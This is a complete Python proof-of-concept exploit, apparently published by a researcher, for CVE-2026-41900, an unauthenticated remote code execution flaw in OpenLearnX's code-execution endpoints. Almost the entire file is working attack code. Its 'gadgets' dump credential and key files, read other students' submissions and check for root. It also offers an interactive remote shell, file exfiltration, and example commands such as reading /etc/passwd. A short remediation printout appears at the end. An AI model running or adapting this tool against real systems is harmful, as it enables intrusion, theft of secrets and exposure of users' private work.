README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import json
import os
import readline
import sys
import textwrap
import urllib.error
import urllib.request
from datetime import datetime, timezone
RESET = "\033[0m"
BOLD = "\033[1m"
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
CYAN = "\033[96m"
DIM = "\033[2m"
MAG = "\033[95m"
WHITE = "\033[97m"
BANNER = f"""
{BLUE}╔═══════════════════════════════════════════════════════════════════╗{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE} ██████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗███████╗{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}██╔═══██╗██║ ╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}██║ ██║██║ ╚███╔╝ ██████╔╝██║ █████╗ {RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}██║ ██║██║ ██╔██╗ ██╔══██╗██║ ██╔══╝ {RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}╚██████╔╝███████╗██╔╝ ██╗ ██║ ██║╚██████╗███████╗{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE} ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {CYAN}OpenLearnX Unauthenticated RCE via Container Volume Mount{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {DIM}Tempfile dir traversal → Secret leak → Root container exec{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {YELLOW}CVE-2026-41900{RESET} • {YELLOW}GHSA-8h25-q488-4hxw{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {MAG}by Christbowel{RESET} {BLUE}║{RESET}
{BLUE}╚═══════════════════════════════════════════════════════════════════╝{RESET}
"""
ENDPOINTS = [
"/api/compiler/execute",
"/api/coding/execute",
"/execute",
]
FAIL_PATTERNS = [
"operation not permitted", "permission denied", "no such file",
"not found", "cannot open", "traceback", "blocked",
"security violation", "modulenotfounderror",
]
GADGETS = {
"listing": {
"severity": "HIGH",
"cwe": "CWE-538",
"desc": "Directory listing of mounted /tmp via /app",
"code": textwrap.dedent("""\
import os
base = '/app'
entries = os.listdir(base)
print(f"LISTING:{len(entries)}")
for e in sorted(entries):
full = os.path.join(base, e)
size = os.path.getsize(full) if os.path.isfile(full) else -1
tag = "DIR" if os.path.isdir(full) else f"{size}B"
print(f" {tag:>10s} {e}")
"""),
"check": lambda o: "LISTING:" in o and int(o.split("LISTING:")[1].split("\n")[0]) > 1,
},
"secrets": {
"severity": "CRITICAL",
"cwe": "CWE-538 / CWE-377",
"desc": "Read credentials and secrets from /tmp",
"code": textwrap.dedent("""\
import os, glob
found = False
for pat in ['/app/*.conf', '/app/*.pem', '/app/*.key', '/app/*.env',
'/app/*.json', '/app/*.yml', '/app/*.yaml', '/app/*.cfg',
'/app/*.ini', '/app/*.secret', '/app/*.sock']:
for f in glob.glob(pat):
if os.path.isfile(f) and os.path.getsize(f) < 50000:
found = True
print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
print(open(f).read()[:800])
print("---")
if not found:
for f in sorted(glob.glob('/app/*'))[:15]:
if os.path.isfile(f) and not f.endswith('.py') and os.path.getsize(f) < 50000:
found = True
print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
print(open(f).read()[:500])
print("---")
if not found:
print("NO_FILES")
"""),
"check": lambda o: "FILE:" in o,
},
"submissions": {
"severity": "HIGH",
"cwe": "CWE-538",
"desc": "Read other students' code submissions from /tmp",
"code": textwrap.dedent("""\
import os, glob
own = os.path.abspath(__file__) if '__file__' in dir() else ''
pyfiles = [f for f in glob.glob('/app/*.py')
if os.path.isfile(f) and os.path.abspath(f) != own]
if pyfiles:
print(f"SUBMISSIONS:{len(pyfiles)}")
for f in sorted(pyfiles)[:10]:
print(f"\\n--- {os.path.basename(f)} ({os.path.getsize(f)}B) ---")
print(open(f).read()[:600])
else:
print("NO_SUBMISSIONS")
"""),
"check": lambda o: "SUBMISSIONS:" in o,
},
"rootcheck": {
"severity": "MEDIUM",
"cwe": "CWE-250",
"desc": "Confirm root execution (no user= in containers.run)",
"code": "import os; uid=os.getuid(); gid=os.getgid(); print(f'UID:{uid} GID:{gid}')",
"check": lambda o: "UID:0" in o,
},
"caps": {
"severity": "MEDIUM",
"cwe": "CWE-250",
"desc": "Default Docker capabilities (no cap_drop)",
"code": textwrap.dedent("""\
caps = {}
for line in open('/proc/1/status'):
if line.startswith('Cap'):
k, v = line.strip().split(':\\t')
caps[k] = v
eff = int(caps.get('CapEff', '0'), 16)
print(f"CAPEFF:0x{eff:016x}")
print("DEFAULT_CAPS" if eff > 0 else "CAPS_DROPPED")
"""),
"check": lambda o: "DEFAULT_CAPS" in o,
},
}
def log_ok(msg):
print(f" {GREEN}[+]{RESET} {msg}")
def log_fail(msg):
print(f" {RED}[-]{RESET} {msg}")
def log_info(msg):
print(f" {BLUE}[*]{RESET} {msg}")
def log_warn(msg):
print(f" {YELLOW}[!]{RESET} {msg}")
def log_hit(sev, msg):
colors = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN, "INFO": DIM}
c = colors.get(sev, WHITE)
print(f" {c}[{sev}]{RESET} {msg}")
def http_post(url, payload, timeout=20):
body = json.dumps(payload).encode()
req = urllib.request.Request(url, data=body,
headers={"Content-Type": "application/json"},
method="POST")
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
return resp.status, json.loads(resp.read())
except urllib.error.HTTPError as e:
try:
return e.code, json.loads(e.read())
except Exception:
return e.code, {"error": str(e)}
except urllib.error.URLError as e:
return 0, {"error": f"{e.reason}"}
except Exception as e:
return 0, {"error": str(e)}
def http_get(url, timeout=10):
req = urllib.request.Request(url, method="GET")
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
return resp.status, json.loads(resp.read())
except Exception:
return 0, {}
def execute(endpoint, code, lang="python"):
status, resp = http_post(endpoint, {"language": lang, "code": code})
output = (resp.get("output") or "").strip()
error = (resp.get("error") or "").strip()
blocked = resp.get("blocked", False)
return output, error, blocked
def is_hit(output, blocked=False):
if blocked or not output:
return False
low = output.lower()
return not any(p in low for p in FAIL_PATTERNS)
def find_endpoint(target):
for suffix in ENDPOINTS:
url = target + suffix
log_info(f"Probing {DIM}{url}{RESET}")
out, err, blk = execute(url, 'print("OLX_PROBE_OK")')
if "OLX_PROBE_OK" in out:
log_ok(f"Live endpoint: {GREEN}{url}{RESET}")
return url
elif blk:
log_warn(f"Blocked (patched?) at {url}")
return None
def run_check(target):
print(f"\n{BOLD}[CHECK]{RESET} Verifying {target}\n")
health_url = target + "/api/compiler/health"
log_info(f"GET {health_url}")
status, resp = http_get(health_url)
if status == 200:
log_ok(f"Health OK — Docker: {resp.get('docker_available')}")
else:
log_info("Health endpoint not found (expected for pre-patch)")
ep = find_endpoint(target)
if not ep:
log_fail("No live execution endpoint found")
return None, False
out, _, _ = execute(ep, "import os; print(f'UID:{os.getuid()}')")
root = "UID:0" in out
out2, _, _ = execute(ep, textwrap.dedent("""\
import os
try:
n = len(os.listdir('/app'))
print(f"MOUNT:{n}")
except:
print("NO_MOUNT")
"""))
mount = "MOUNT:" in out2
print()
if root and mount:
log_ok(f"{GREEN}VULNERABLE{RESET} — root exec + /tmp volume mount exposed")
return ep, True
elif mount:
log_warn(f"{YELLOW}PARTIAL{RESET} — /tmp mounted but not root")
return ep, True
elif root:
log_warn(f"{YELLOW}PARTIAL{RESET} — root exec but /tmp not mounted")
return ep, True
else:
log_fail(f"{RED}NOT VULNERABLE{RESET} — patched or different config")
return ep, False
def run_gadget(ep, name):
g = GADGETS[name]
log_hit(g["severity"], f"{g['desc']} {DIM}({g['cwe']}){RESET}")
out, err, blk = execute(ep, g["code"])
if blk:
print(f" {RED}BLOCKED{RESET} — security filter")
return False
if g["check"](out):
for line in out.splitlines()[:30]:
print(f" {DIM}│{RESET} {line}")
return True
else:
detail = out[:120] or err[:120] or "(empty)"
print(f" {DIM}not confirmed: {detail}{RESET}")
return False
def run_all_gadgets(ep):
print(f"\n{BOLD}[EXPLOIT]{RESET} Running all gadgets against {CYAN}{ep}{RESET}\n")
results = {}
evidence = []
for name, g in GADGETS.items():
hit = run_gadget(ep, name)
results[name] = hit
if hit:
evidence.append({"gadget": name, "severity": g["severity"], "cwe": g["cwe"]})
print()
return results, evidence
def run_command(ep, cmd):
code = textwrap.dedent(f"""\
import subprocess
r = subprocess.run({repr(cmd)}, shell=True, capture_output=True, text=True, timeout=15)
if r.stdout: print(r.stdout, end='')
if r.stderr: print(r.stderr, end='')
""")
out, err, blk = execute(ep, code)
if blk:
return f"{RED}[blocked by security filter]{RESET}"
return out or err or ""
def interactive_shell(ep):
print(f"\n{BOLD}{CYAN}┌──────────────────────────────────────────────┐{RESET}")
print(f"{BOLD}{CYAN}│ OLX Remote Shell — CVE-2026-41900 │{RESET}")
print(f"{BOLD}{CYAN}│ Type 'exit' or Ctrl+C to quit │{RESET}")
print(f"{BOLD}{CYAN}│ Each command spawns a new container │{RESET}")
print(f"{BOLD}{CYAN}└──────────────────────────────────────────────┘{RESET}\n")
out, _, _ = execute(ep, "import os; print(os.uname().nodename)")
hostname = out.strip() or "container"
histfile = os.path.expanduser("~/.olx_shell_history")
try:
readline.read_history_file(histfile)
except FileNotFoundError:
pass
while True:
try:
prompt = f"{RED}root@{hostname}{RESET}:{BLUE}/app{RESET}# "
cmd = input(prompt)
except (EOFError, KeyboardInterrupt):
print(f"\n{DIM}[shell closed]{RESET}")
break
cmd = cmd.strip()
if not cmd:
continue
if cmd.lower() in ("exit", "quit"):
print(f"{DIM}[shell closed]{RESET}")
break
if cmd.startswith("download "):
remote_path = cmd.split(" ", 1)[1].strip()
download_file(ep, remote_path)
continue
result = run_command(ep, cmd)
if result:
print(result)
try:
readline.write_history_file(histfile)
except Exception:
pass
def download_file(ep, remote_path):
if not remote_path.startswith("/app/"):
remote_path = "/app/" + remote_path.lstrip("/")
code = textwrap.dedent(f"""\
import base64, os
path = {repr(remote_path)}
if os.path.isfile(path):
data = open(path, 'rb').read()
print(f"SIZE:{{len(data)}}")
print(base64.b64encode(data).decode())
else:
print("NOT_FOUND")
""")
out, err, blk = execute(ep, code)
if "NOT_FOUND" in out or blk:
log_fail(f"File not found: {remote_path}")
return
lines = out.strip().splitlines()
if len(lines) >= 2 and lines[0].startswith("SIZE:"):
import base64
size = int(lines[0].split(":")[1])
data = base64.b64decode(lines[1])
local = os.path.basename(remote_path)
with open(local, "wb") as f:
f.write(data)
log_ok(f"Downloaded {local} ({size}B)")
else:
log_fail(f"Unexpected response: {out[:100]}")
def save_evidence(target, ep, evidence):
report = {
"cve": "CVE-2026-41900",
"ghsa": "GHSA-8h25-q488-4hxw",
"target": target,
"endpoint": ep,
"auth_required": False,
"timestamp": datetime.now(timezone.utc).isoformat(),
"findings": evidence,
}
path = "cve-2026-41900-evidence.json"
with open(path, "w") as f:
json.dump(report, f, indent=2)
return path
def print_report(target, ep, results, evidence):
total = sum(1 for v in results.values() if v)
sevmap = {}
for e in evidence:
sevmap.setdefault(e["severity"], []).append(e["gadget"])
print(f"\n{BLUE}{'═' * 65}{RESET}")
print(f" {BOLD}CVE-2026-41900 — RESULTS{RESET}")
print(f"{BLUE}{'═' * 65}{RESET}")
print(f" Target : {WHITE}{target}{RESET}")
print(f" Endpoint : {CYAN}{ep}{RESET}")
print(f" Auth : {RED}NONE REQUIRED{RESET}")
print(f" Date : {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC')}")
print()
if total == 0:
log_fail("No vectors confirmed — instance appears patched")
else:
for sev in ("CRITICAL", "HIGH", "MEDIUM"):
if sev in sevmap:
colors = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN}
c = colors[sev]
print(f" {c}[{sev:>8s}]{RESET} {', '.join(sevmap[sev])}")
print(f"\n {BOLD}Total : {total} confirmed{RESET}")
print()
print(f" {GREEN}REMEDIATION:{RESET}")
print(f" {DIM}→ Update to commit 14765d7 or later{RESET}")
print(f" {DIM}→ Apply: cap_drop=['ALL'], user='65534:65534'{RESET}")
print(f" {DIM}→ Use per-execution tmpdir, not shared /tmp{RESET}")
print(f"{BLUE}{'═' * 65}{RESET}")
if evidence:
path = save_evidence(target, ep, evidence)
print(f"\n {GREEN}Evidence → {path}{RESET}")
def build_parser():
p = argparse.ArgumentParser(
prog="olx-rce",
description="CVE-2026-41900 — OpenLearnX Unauthenticated RCE via Container Volume Mount",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent(f"""\
{BOLD}examples:{RESET}
%(prog)s --check http://target:5000
%(prog)s --exploit http://target:5000
%(prog)s --shell http://target:5000
%(prog)s -c "id" http://target:5000
%(prog)s -c "cat /etc/passwd" http://target:5000
%(prog)s --gadget secrets http://target:5000
%(prog)s --gadget listing --gadget caps http://target:5000
{BOLD}gadgets:{RESET}
listing /tmp directory listing via volume mount [HIGH]
secrets Read credentials and keys from /tmp [CRITICAL]
submissions Read other users' code submissions [HIGH]
rootcheck Confirm UID 0 execution [MEDIUM]
caps Dump effective Linux capabilities [MEDIUM]
{BOLD}shell commands:{RESET}
download <path> Exfiltrate a file from /app to local dir
exit Close the shell
"""),
)
mode = p.add_argument_group("modes")
mode.add_argument("--check", action="store_true",
help="Check if target is vulnerable (no exploitation)")
mode.add_argument("--exploit", action="store_true",
help="Run all gadgets and generate evidence report")
mode.add_argument("--shell", action="store_true",
help="Drop into an interactive remote shell")
mode.add_argument("-c", "--command", metavar="CMD",
help="Execute a single command and exit")
mode.add_argument("--gadget", action="append", metavar="NAME",
choices=list(GADGETS.keys()),
help="Run a specific gadget (repeatable)")
p.add_argument("target", metavar="TARGET",
help="Base URL of the OpenLearnX instance (e.g. http://host:5000)")
p.add_argument("-q", "--quiet", action="store_true",
help="Suppress banner")
return p
def main():
parser = build_parser()
args = parser.parse_args()
if not args.quiet:
print(BANNER)
target = args.target.rstrip("/")
if not any([args.check, args.exploit, args.shell, args.command, args.gadget]):
parser.print_help()
sys.exit(0)
if args.check:
ep, vuln = run_check(target)
sys.exit(0 if vuln else 1)
ep = find_endpoint(target)
if not ep:
log_fail("No live execution endpoint found")
log_info("Run with --check for detailed diagnostics")
sys.exit(1)
if args.command:
result = run_command(ep, args.command)
print(result)
sys.exit(0)
if args.gadget:
print(f"\n{BOLD}[GADGETS]{RESET} {', '.join(args.gadget)}\n")
for name in args.gadget:
run_gadget(ep, name)
print()
sys.exit(0)
if args.exploit:
results, evidence = run_all_gadgets(ep)
print_report(target, ep, results, evidence)
sys.exit(0 if any(results.values()) else 1)
if args.shell:
interactive_shell(ep)
sys.exit(0)
if __name__ == "__main__":
main()